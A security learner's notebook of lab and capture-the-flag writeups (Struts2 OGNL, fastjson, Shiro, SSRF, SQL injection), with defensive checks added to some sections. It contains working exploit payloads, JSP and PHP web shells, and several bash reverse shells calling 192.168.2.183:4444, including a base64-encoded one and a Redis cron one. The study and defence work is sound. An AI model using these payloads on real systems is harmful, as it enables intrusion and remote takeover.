S2-001 OGNL command execution

Overview

Root cause

The vulnerability arises because, when a user submits form data and validation fails, the back end re-parses the previously submitted parameter values with the OGNL expression %{value} before refilling them into the corresponding form fields. On a registration or login page, for example, a failed submission normally gets the previously submitted data echoed back; because the back end runs that data through one round of OGNL evaluation via %{value}, a payload can be constructed directly to execute commands.

Impact

See reference link 1

Environment setup


cd struts2/s2-001
docker-compose up -d

Reproduction

Capture the login request

Construct a payload that runs ls -a

username=admin&password=%25{%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{"ls","-a"})).redirectErrorStream(true).start(),%23b%3d%23a.getInputStream(),%23c%3dnew+java.io.InputStreamReader(%23b),%23d%3dnew+java.io.BufferedReader(%23c),%23e%3dnew+char[50000],%23d.read(%23e),%23f%3d%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),%23f.getWriter().println(new+java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()}


Attack and defense

Exploitation

GitHub xfiftyone/STS2G: Struts2 vulnerability scanning and exploitation tool, Golang edition. Struts2 Scanner Written in Golang

GitHub HatBoy/Struts2-Scan: Struts2 full-vulnerability scanning and exploitation tool

Defense

Upgrade Struts to 2.0.9 or upgrade XWork to 2.0.4
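Alongside the upgrade, a defender can watch for the expression markers this bug evaluates. The check below is an added example, not code from the page or from the Struts project: it parses a form body, strips repeated URL encoding (the payload above writes %25{ for %{) and reports fields carrying OGNL markers. Field names and sample bodies are constructed.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote

# Markers of an OGNL expression of the kind S2-001 re-evaluates when it refills the
# form: the %{...} / ${...} wrapper, '#name=' variable assignments, the '#context'
# object and fully qualified java.lang / java.io class names.
MARKERS = {
    "expr_wrapper": re.compile(r"[%$]\{"),
    "ognl_variable": re.compile(r"#[A-Za-z_]\w*\s*="),
    "action_context": re.compile(r"#context\b"),
    "java_class": re.compile(r"\bjava\.(?:lang|io)\.[A-Za-z_]\w*"),
}


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """Undo repeated URL encoding (%2525%7B -> %25{ -> %{) until the value is stable."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_form_body(body: str) -> List[Tuple[str, List[str]]]:
    """Return (field, [marker names]) for every form field whose value carries OGNL markers.

    parse_qsl already removes one layer of URL encoding; decode_layers removes any
    further layers so that %2525%7B and %25{ are judged the same way.
    """
    findings = []
    for field, raw in parse_qsl(body, keep_blank_values=True):
        value = decode_layers(raw)
        hits = [name for name, rx in MARKERS.items() if rx.search(value)]
        if hits:
            findings.append((field, hits))
    return findings


# Constructed sample bodies (not captured from the lab above): a normal login, a
# singly encoded marker, a doubly encoded one, and a benign value containing
# '%' and '{' that must not trip the check.
SAMPLES = [
    "username=alice&password=hunter2",
    "username=admin&password=%25{%23context}",
    "username=admin&password=%2525%7B%2523context%7D",
    "comment=100%25%20off%20{sale}",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", scan_form_body(sample) or "clean")
```

A legitimate password containing %{ is a false positive, so this is an alerting signal layered on top of the upgrade, not a replacement for it.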

References

S2-001 Apache Struts 2 Wiki Apache Software Foundation

Routing terminal programs through the Burp proxy

Background

While using Burp today I needed to send the traffic of some terminal programs into Burp for analysis. In the end I did it with proxychains.

Create a proxychains configuration file

I already use proxychains in the terminal as a proxy for getting around network blocks. This time I wrote a separate configuration file for Burp.

strict_chain
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# your burp proxy config
http 127.0.0.1 8080

Add the Burp certificate at the system level

Adding the certificate on Linux

# Debian/Ubuntu: update-ca-certificates only picks up PEM files ending in .crt from this
# directory, so convert Burp's DER export to PEM first
mkdir -p /usr/local/share/ca-certificates/burp
openssl x509 -inform der -in your_ca.der -out /usr/local/share/ca-certificates/burp/burp.crt
update-ca-certificates
# RHEL/Fedora: copy your_ca.der (DER or PEM) into /etc/pki/ca-trust/source/anchors/ and run update-ca-trust

Usage example


proxychains -f your_proxychains_config.config your_cmd


Alias


# -q keeps proxychains quiet (no log output)
alias pp='proxychains -q -f ~/tools/burp/proxychains.conf'

fastjson deserialization

Overview

fastjson is a Java library for parsing JSON.

Root cause

When a JSON string contains an @type property, fastjson parses the string into the class it names, so untrusted classes get deserialized.

Impact

Code execution, among others

Versions 1.2.68 and earlier

Environment setup


cd fastjson/1.2.24-rce
docker-compose up -d

Reproduction

Send a JSON request


Building the Exp class

import java.lang.Runtime;
import java.lang.Process;

public class Exp {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash","-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTgzLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Start the RMI server and the Python listener at the same time


Send the request and catch the reverse shell


Payload

{
    "b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.2.183:9998/Exploit","autoCommit":true}
}

Attack and defense

Exploitation

For other fastjson versions

1.2.24 (first vulnerability) -> 1.2.41 (blacklist bypass) -> 1.2.42 (blacklist bypass) -> 1.2.45 (new gadget chain) -> 1.2.47 (AutoType bypass) -> 1.2.68 (AutoType bypass)

Defense

Upgrade to a newer version. Newer fastjson releases removed the @type feature, which eliminates the deserialization at its root.
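Where an upgrade cannot happen immediately, a gate in front of the parser can refuse any body that carries an @type key at any depth. This is an added example, not code from the page or from fastjson itself; class names and bodies are constructed placeholders. It walks the parsed object rather than the raw text, because a key written with the JSON escape \u0040type decodes to @type and would slip past a substring check.

```python
import json
from typing import Any, List


def find_type_keys(doc: Any, path: str = "$") -> List[str]:
    """Return the JSON path of every "@type" key in a parsed document, at any depth."""
    hits: List[str] = []
    if isinstance(doc, dict):
        for key, value in doc.items():
            child = f"{path}.{key}"
            if key == "@type":
                hits.append(child)
            hits.extend(find_type_keys(value, child))
    elif isinstance(doc, list):
        for index, value in enumerate(doc):
            hits.extend(find_type_keys(value, f"{path}[{index}]"))
    return hits


def type_key_paths(body: str) -> List[str]:
    """Parse body as JSON and return the paths of all "@type" keys (ValueError if not JSON)."""
    return find_type_keys(json.loads(body))


def reject_autotype(body: str) -> bool:
    """True if a request body must be refused before it reaches fastjson.

    Malformed JSON is refused too: the gate must never be more lenient than the
    parser behind it, or an attacker picks the body only fastjson understands.
    """
    try:
        return bool(type_key_paths(body))
    except ValueError:
        return True


# Constructed sample bodies; class names are placeholders, not the page's gadget.
# ESCAPED_BODY spells the key as \u0040type, so the literal text "@type" never appears in it.
PLAIN_BODY = '{"id":"","name":"","grade":""}'
TYPED_BODY = '{"b":{"@type":"com.example.SomeClass","dataSourceName":"x","autoCommit":true}}'
ESCAPED_BODY = '{"b":{"\\u0040type":"com.example.SomeClass"}}'
NESTED_BODY = '[{"a":{"@type":"com.example.A"}},{"@type":"com.example.B"}]'

if __name__ == "__main__":
    for body in (PLAIN_BODY, TYPED_BODY, ESCAPED_BODY, NESTED_BODY):
        print(reject_autotype(body), type_key_paths(body), body)
```

fastjson's own tokenizer is more permissive than strict JSON in places, so a gate like this has to sit where it sees exactly what the parser sees; it narrows exposure but the version upgrade is the fix.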

References

Java from Getting Started to Giving Up series: Fastjson deserialization (part 1)

SQL injection

Overview

Root cause

The developer does not strictly filter user-supplied parameters, so malicious SQL gets concatenated into the SQL statement.

Impact

Dumping the database

Modifying database contents

Taking control of the website

Classification

By exploitation technique

UNION-based injection

Error-based injection

Boolean-based blind injection

Time-based blind injection

By SQL statement type

SELECT (most common)

UPDATE

INSERT

DELETE

Special injection techniques

Wide-byte injection

Double-encoding injection

Second-order injection

Stacked-query injection

Discovery

Black box

General manual testing method:

Exercise the site's normal functionality

Test which quote or delimiter closes the injected string

Find the echo position (the column reflected in the response)

Extract information

White box

Key PHP function: mysqli_query

Inspect each place that executes a SQL statement for unsafe string concatenation

Attack and defense

Exploitation

Retrieving database information in MySQL

Writing a shell through MySQL

Via the log file

INTO OUTFILE

Defense

PDO prepared statements

Minimize database privileges

Separate the web server from the database server
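The concatenation flaw and the prepared-statement fix side by side, as an added example that is not from the page: the same login check written the mysqli_query-and-concatenation way and with bound parameters (Python's sqlite3 placeholders play the role of PDO::prepare/execute). The database, accounts and inputs are constructed; the universal-password input is the form this page's later writeups use, with SQLite's "--" comment where MySQL would also take "#".

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one user table holding a single admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: input is spliced into the statement text, so quotes in the input
    change the query's structure instead of being compared as data."""
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_param(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: placeholders bind the input as values; the statement text never changes.
    This is the sqlite3 form of PDO::prepare() followed by execute() with bound parameters."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Constructed inputs: valid credentials, the classic universal password, and the
# comment-truncation form that discards the password check entirely.
ATTEMPTS = [
    ("admin", "s3cret"),
    ("admin' OR '1'='1", "anything"),
    ("admin'--", "anything"),
]

if __name__ == "__main__":
    db = make_db()
    for user, pw in ATTEMPTS:
        print(repr(user), "concat:", login_concat(db, user, pw), "param:", login_param(db, user, pw))
```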

Bypassing defenses

Various encodings

Other

Tools

[[sqlmap]]

Practice targets

[[sqli-labs]]

Articles

CVE-2016-4437

Overview

Shiro550, also known as the Apache Shiro deserialization vulnerability

Root cause

The Shiro framework uses a default or predictable AES encryption key when handling the remember-me (RememberMe) feature, so an attacker can construct malicious serialized data that the server accepts.

Flow:

The user ticks Remember Me when logging in

The server validates the login and returns an encrypted cookie

Encryption of the data: serialized user data -> AES encryption -> base64 encoding

The response returned after a successful login with RememberMe ticked


Impact

Apache Shiro 1.2.4 and earlier

Command execution

Environment setup

Set up with the docker-compose.yml provided by vulhub

cd shiro/CVE-2016-4437
docker-compose up -d

Reproduction

Vulnerability indicator:

The login response contains Set-Cookie: rememberMe=deleteMe;

Confirming the vulnerability:

Use the URLDNS deserialization chain for DNS exfiltration to detect whether a deserialization vulnerability exists.

Reproduction steps:

Attempt a login; the response contains the indicator Set-Cookie: rememberMe=deleteMe;


Generate the payload

java -jar ysoserial-all.jar URLDNS "http://lu5bzg.dnslog.cn" > poc.ser

Construct the cookie


For the construction code, refer to vulhub

Send the request carrying the cookie


Check the dnslog platform


A DNS resolution has come in, which proves the deserialization vulnerability exists

Attack and defense

Exploitation

Use the CommonsBeanutils1 deserialization chain for command execution

Reverse shell: generate the payload

java -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTgzLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser

Construct the cookie and send the request


Tools

GitHub frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

GitHub SummerSec/ShiroAttack2: comprehensive exploitation tool for the shiro deserialization vulnerability, including command execution with output and in-memory webshell injection; fixes the NoCC problem of the original https://github.com/j1anFen/shiro_attack

Defense

Update Shiro to a version above 1.2.4

Configure a custom AES key. Configuration file: shiro.ini

References

Vulhub Docker-Compose file for vulnerability environment

Analysis of the shiro deserialization vulnerability and its reproduction - FreeBuf cybersecurity industry portal

week9_kls_exam

Problem 1

Upload a webshell


Connected with AntSword and found a troll note


It tells me the flag isn't here. Could there be an internal-network machine?

Look at /etc/hosts


Start brute-forcing


Hmm, it's command execution outright; let's go


Payload

Command execution

cmd=id&cat flag.php

SSRF: a double-URL-encoded gopher:// POST to 192.168.9.11:80 carrying the same cmd parameter


flag{4104d0bdc968e8709b51f71cb3c755790e15e4df}

Problem 2

Logged in successfully with the password 123456

Looks like there's SQL injection?? Whatever, going all in


timu2

POST /get_students.php HTTP/1.1
Host: 8.140.229.12:10001
Content-Length: 30
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://8.140.229.12:10001
Referer: http://8.140.229.12:10001/students.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=df31b1421a4fd4fff8f4b519d8afcd5f
Connection: keep-alive

{"id":"","name":"","grade":""}

flag{5e5326c0a2d2b4ce3e481f8bdd7f0da6}

Problem 3

Scan for paths


Nothing much there, so let's try logging in. A universal password works, but strangely there is no redirect at all.

The login endpoint turns out to look like this: XXE at a glance


The echo position is the uuid field. Including /etc/passwd succeeds.

Including flag.php throws an error, but the scan did find the file, so try the php:// filter wrapper to base64-encode it.

Payload

<!DOCTYPE root [<!ENTITY test SYSTEM 'php://filter/convert.base64-encode/resource=/var/www/html/flag.php'>]><login><user>admin'or 1=1#</user><pass>123213</pass><uuid>&test;</uuid></login>


flag{550c41a03d1646a97b7a68e6718e94ab}

Problem 4

There is file inclusion; try to read the source

index.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>首页</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f9f9f9;
            color: #333;
        }
        header {
            background-color: #0078D7;
            color: white;
            padding: 20px;
            text-align: center;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
        nav {
            margin: 20px auto;
            text-align: center;
        }
        nav a {
            display: inline-block;
            margin: 10px 20px;
            padding: 10px 20px;
            text-decoration: none;
            color: #0078D7;
            border: 2px solid #0078D7;
            border-radius: 5px;
            font-weight: bold;
            transition: all 0.3s;
        }
        nav a:hover {
            background-color: #0078D7;
            color: white;
        }
        footer {
            text-align: center;
            padding: 10px 20px;
            background-color: #f1f1f1;
            border-top: 1px solid #ddd;
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <header>
        <h1>欢迎来到首页</h1>
    </header>
    <nav>
        <a href="index.php">首页</a>
        <a href="index.php?file=test.php">猜猜这是什么 - Page 1</a>
        <a href="index.php?file=class.php">猜猜这是什么 - Page 2</a>
        <a href="index.php?file=flag.php">Flag</a>
    </nav>
    <footer>
        &copy; 2025 cybersecurity
    </footer>
</body>
</html>
<?php
if (isset($_GET['file'])) {
    if (preg_match('/flag/', $_GET['file'])) {
        exit("hacker~");
    } else {
        include($_GET['file']);
    }
}
?>

class.php

<?php
class Main{
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new Test3();
    }
    function __wakeup() {
        $this->ClassObj->action();
    }
}
class Output{
    function action() {
        echo "hello chaitin";
    }
}
class Test3{
    public $data;
    public $str = "phpinfo();";
    function action() {
        echo file_get_contents($this->data);
    }
    function info()
    {
        @eval($this->str);
    }
}

test.php

<?php
echo "flag在flag.php";
require "class.php";
@unserialize($_GET['nb']);

Deserialization at a glance; try including /etc/passwd first


The filter in index.php doesn't seem to cover the nb parameter, so we include flag.php directly

Generate the payload

<?php
class Main{
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new Test3();
    }
}
class Test3{
    public $data;
    public function __construct() {
        // the file Test3::action() will read; this is the value carried in the payload below
        $this->data = "/var/www/html/flag.php";
    }
}
$m = new Main();
echo serialize($m);
?>

Payload

?file=test.php&nb=O:4:"Main":1:{s:8:"ClassObj";O:5:"Test3":1:{s:4:"data";s:22:"/var/www/html/flag.php";}}


flag{92d5c6f8df9f7f5a711157446fbc1915}

week8_kls_exam

Problem 1

Boo, not an admin


Took a look at the cookie and found it's just a base64 username, so forge one directly


Pop a reverse shell and grab the flag

flag{4833f846682676c86360fa717f423c88}

Problem 2

Should have gone with Yuandao all along: buy -10000 of them, the shop pays out a rebate, and I tearfully buy the flag with it


flag{fb5c50b9dda4ddacaedf622878199ebc}

Problem 3

Scanning found admin.php


But it requires a login, and I can't log in

Try a universal password


Now admin.php can be viewed


flag{b6acd4cdd256c54704b09f12c1585a51}

Problem 4

Can't guess the password, so tweak the cookie instead


Look at the code of upload.php

<?php
//session_start();
//
//// check whether the user is logged in
//if (!isset($_SESSION['user_id'])) {
//    header("Location: login.php");
//    exit();
//}
if ($_COOKIE["is_login"] == "false") {
    header("Location: login.php");
    exit();
}
// target directory for uploaded files
$target_dir = "uploads/";
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['fileToUpload'])) {
    // 🐮🍺 🐮🍺 🐮🍺 🐮🍺 🐮🍺 🐮🍺
    $filename = date("Ymd").rand(000,999).basename($_FILES['fileToUpload']['name']);
    $target_file = $target_dir . $filename;
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
    // check the file size (5 MB limit)
    if ($_FILES['fileToUpload']['size'] > 5000000) {
        echo "Sorry, your file is too large.";
        $uploadOk = 0;
    }
    // only allow specific file types
    if($imageFileType != "jpg" && $imageFileType != "jpeg" && $imageFileType != "zip") {
        echo "Sorry, files are allowed.";
        $uploadOk = 0;
    }
    // check whether $uploadOk is 0 (the upload failed)
    if ($uploadOk == 0) {
        echo "Sorry, your file was not uploaded.";
    } else {
        // try to upload the file
        if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $target_file)) {
            echo "The file has been uploaded.";
        } else {
            echo "Sorry, there was an error uploading your file.";
        }
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>File Upload</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <?php include("includes/header.php"); ?>
    <h2>文件上传</h2>
    <form action="upload.php" method="post" enctype="multipart/form-data">
        选择一个文件上传<br/>
        <p style="color: red">提示:flag文件在 /flag.txt</p>
        <input type="file" name="fileToUpload" id="fileToUpload" required>
        <button type="submit" value="Upload File">上传</button>
    </form>
    <?php include("includes/footer.php"); ?>
</body>
</html>

It has to be brute-forced; let's go


That was wrong: the file name actually looks like YYYYMMDDxxxfilename, where xxx is 000-999 and filename is the original file name.

Upload a zip, have it parsed via phar, and connect with AntSword


Add the cookie and done

flag{e723e6038bc25659e0675ba068e041a2}

ssrf-vuls

Setup

docker-compose.yml

version: '2'
networks:
  ssrf_v:
    ipam:
      config:
        - subnet: 172.72.23.0/24
          gateway: 172.72.23.1
services:
  ssrfweb1:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v1
    ports:
      - 8088:80
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.21
  ssrfweb2:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v2
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.22
  ssrfweb3:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v3
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.23
  ssrfweb4:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v4
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.24
  ssrfweb5:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v5
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.25
  ssrfweb6:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v6
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.26
  ssrfweb7:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v7
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.27

Introduction

The SSRF lab by Guoguang (国光).

Seven services in total: one on the external network, six on the internal network.

Walkthrough

web1

There's only one input box; let's try the normal functionality first


SSRF exists; try reading a local file


Get the flag


flag: This is flag

Preparation for the remaining levels

There are six internal targets that cannot be reached directly, and nothing is known about them. We try to probe the internal network through the SSRF.

Preparation before probing

The host's own IP

The point of getting the IP is to learn the /24 network address

Read /etc/hosts, /proc/net/arp or /proc/net/fib_trie to get the host's IP


Clearly the current /24 network address is 172.72.23.0

Port probing with dict

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>

Port probing

In this lab there is no way to know the open ports in advance, so we brute-force common ports across the /24.

Brute-force with Burp

Configure the attack parameters


Payload 1: the IPs of the /24


Payload 2: the top 100 common ports


Go. For this step a small Python script could filter out the responses whose echo position is empty.

These are the results we found


Quickly extract the successful payloads

Select the payloads that probed successfully and export them


Note: untick the base64-encode option

Extract the information from the exported file


Scan results


url=dict%3A%2F%2F172.72.23.22%3A80]]></request>
url=dict%3A%2F%2F172.72.23.23%3A80]]></request>
url=dict%3A%2F%2F172.72.23.24%3A80]]></request>
url=dict%3A%2F%2F172.72.23.25%3A80]]></request>
url=dict%3A%2F%2F172.72.23.26%3A8080]]></request>
url=dict%3A%2F%2F172.72.23.27%3A6379]]></request>

Internal host 172.72.23.22

Visiting it shows a page with nothing on it


Try a directory scan, using the dirsearch wordlist

ffuf -u "http://localhost:8088/" -H "Content-Type: application/x-www-form-urlencoded" -d "url=http%3A%2F%2F172.72.23.22%2FFUZZ" -w dicc.txt  -fw 0-413

Scan results as follows


Visiting each one, we find that phpinfo.php and shell.php exist

shell.php gives a shell directly


Internal host 172.72.23.23

It tells me there is SQL injection


Internal host 172.72.23.24

Command execution at a glance, but this form submits via POST


Use the gopher protocol

gopher://[host]:[port]/[type][selector]

Build a simple POST request

POST / HTTP/1.1
Host: 172.72.23.24
Content-Length: 15
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.2.183:8088
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.2.183:8088/
Connection: keep-alive

ip=127.0.0.1;id

Double-URL-encode it and append it after gopher:// and that's it


Internal host 172.72.23.26

It's a Tomcat


Try exploiting a known historical vulnerability

Construct the request

PUT /1.jsp/ HTTP/1.1
Host: 172.72.23.26:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 202

<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) out.print(new String(b, 0, a)); %>

Payload: the PUT request above, double-URL-encoded and appended after gopher://172.72.23.26:8080/_

Access the JSP


Internal host 172.72.23.27

The port is 6379; try writing a cron job

# terminal1
nc -l 9900 -k -C > payload
# terminal2
timeout 0.5 redis-cli -p 9900 CONFIG SET dir /var/spool/cron/
timeout 0.5 redis-cli -p 9900 CONFIG SET dbfilename root
timeout 0.5 redis-cli -p 9900 set test $'\n* * * * * /bin/bash -i >& /dev/tcp/192.168.2.183/4444 0>&1\n'
timeout 0.5 redis-cli -p 9900 SAVE

Double-URL-encode the contents of the payload file to obtain the final payload

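Every level above rests on the first service fetching whatever URL it is given: dict:// for port probing, gopher:// for POST bodies, Redis and Tomcat, file:// for local files. The validator below is an added example (not from the lab or the page) of what that service should have done before fetching: allow only http/https on 80/443, refuse userinfo, resolve the host and reject loopback, private, link-local and IPv4-mapped addresses, and optionally require a host allowlist. Host names and the fake resolver are constructed. Note the lab's own 172.72.23.0/24 is not an RFC 1918 range, so the address check alone passes it; only the allowlist refuses it.

```python
import ipaddress
import socket
from typing import Callable, Iterable, List, Optional
from urllib.parse import urlsplit

# Only plain web fetches are legitimate for a URL-fetching feature; dict://,
# gopher:// and file:// are what turned this lab's SSRF into a port scanner
# and a Redis/Tomcat client.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def system_resolve(host: str) -> List[str]:
    """Real DNS lookup returning every address for host (tests inject a fake instead)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def forbidden_address(ip: str) -> bool:
    """Loopback, RFC 1918/ULA, link-local (169.254.x, incl. cloud metadata), multicast, reserved."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is judged as 127.0.0.1
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_outbound_url(url: str,
                       allowed_hosts: Optional[Iterable[str]] = None,
                       resolve: Callable[[str], List[str]] = system_resolve) -> str:
    """Return 'ok' or 'refused: <reason>' for a user-supplied URL the server would fetch.

    Checks run cheapest-first: scheme, userinfo, port, host allowlist, then the
    resolved addresses. The caller must connect to the address checked here
    rather than resolve again, or a DNS rebinding answer can swap in an internal IP.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return "refused: unparsable URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"refused: scheme {scheme or '<none>'}"
    if parts.username is not None or parts.password is not None:
        return "refused: userinfo in URL"
    try:
        host, port = parts.hostname, parts.port
    except ValueError:
        return "refused: malformed port"
    if not host:
        return "refused: no host"
    port = port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return f"refused: port {port}"
    if allowed_hosts is not None and host.lower() not in {h.lower() for h in allowed_hosts}:
        return f"refused: host {host} not in allowlist"
    try:
        addresses = [str(ipaddress.ip_address(host))]   # IP literal: nothing to resolve
    except ValueError:
        addresses = resolve(host)
    if not addresses:
        return f"refused: {host} does not resolve"
    for ip in addresses:
        if forbidden_address(ip):
            return f"refused: {host} -> {ip} is not a public address"
    return "ok"


def fake_resolve(host: str) -> List[str]:
    """Constructed resolver for offline use: one internal name, one public name."""
    table = {"internal.example.com": ["10.0.0.5"], "images.example.com": ["93.184.216.34"]}
    return table.get(host, [])


if __name__ == "__main__":
    for candidate in ("dict://172.72.23.22:80", "gopher://172.72.23.27:6379/_", "file:///etc/passwd",
                      "http://127.0.0.1:6379/", "http://172.72.23.22/", "http://internal.example.com/"):
        print(candidate, "->", check_outbound_url(candidate, resolve=fake_resolve))
```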

References

GitHub sqlsec/ssrf-vuls: source of Guoguang's hands-on SSRF internal-network penetration lab

SSRF (Server-Side Request Forgery) | Exploit Notes

week7_kls_exam

Problem 1

Looks like error-based injection; going all in


The database holds the password


After logging in, there's command execution


flag{596cc5eb82d76a731492b37e772b4eea}

Problem 2

We have the password, so log in directly


Found file inclusion


Go straight at the file inclusion


flag{c2dde9962b21827fe0a7fcf6d4fc9676}

Problem 3

It tells me the flag is here; let's go

Read the file


Decode


$flag = flag{b2bf768baf961050658884ca2632fc73}

Problem 4

Scanning found a leftover .swp file


Recovered, it looks like this


Try exploiting a historical PHP vulnerability

select '<?php @eval($_GET['cmd']); ?>'


flag{38e225d12d7dd49b84e5a06baf55b30d}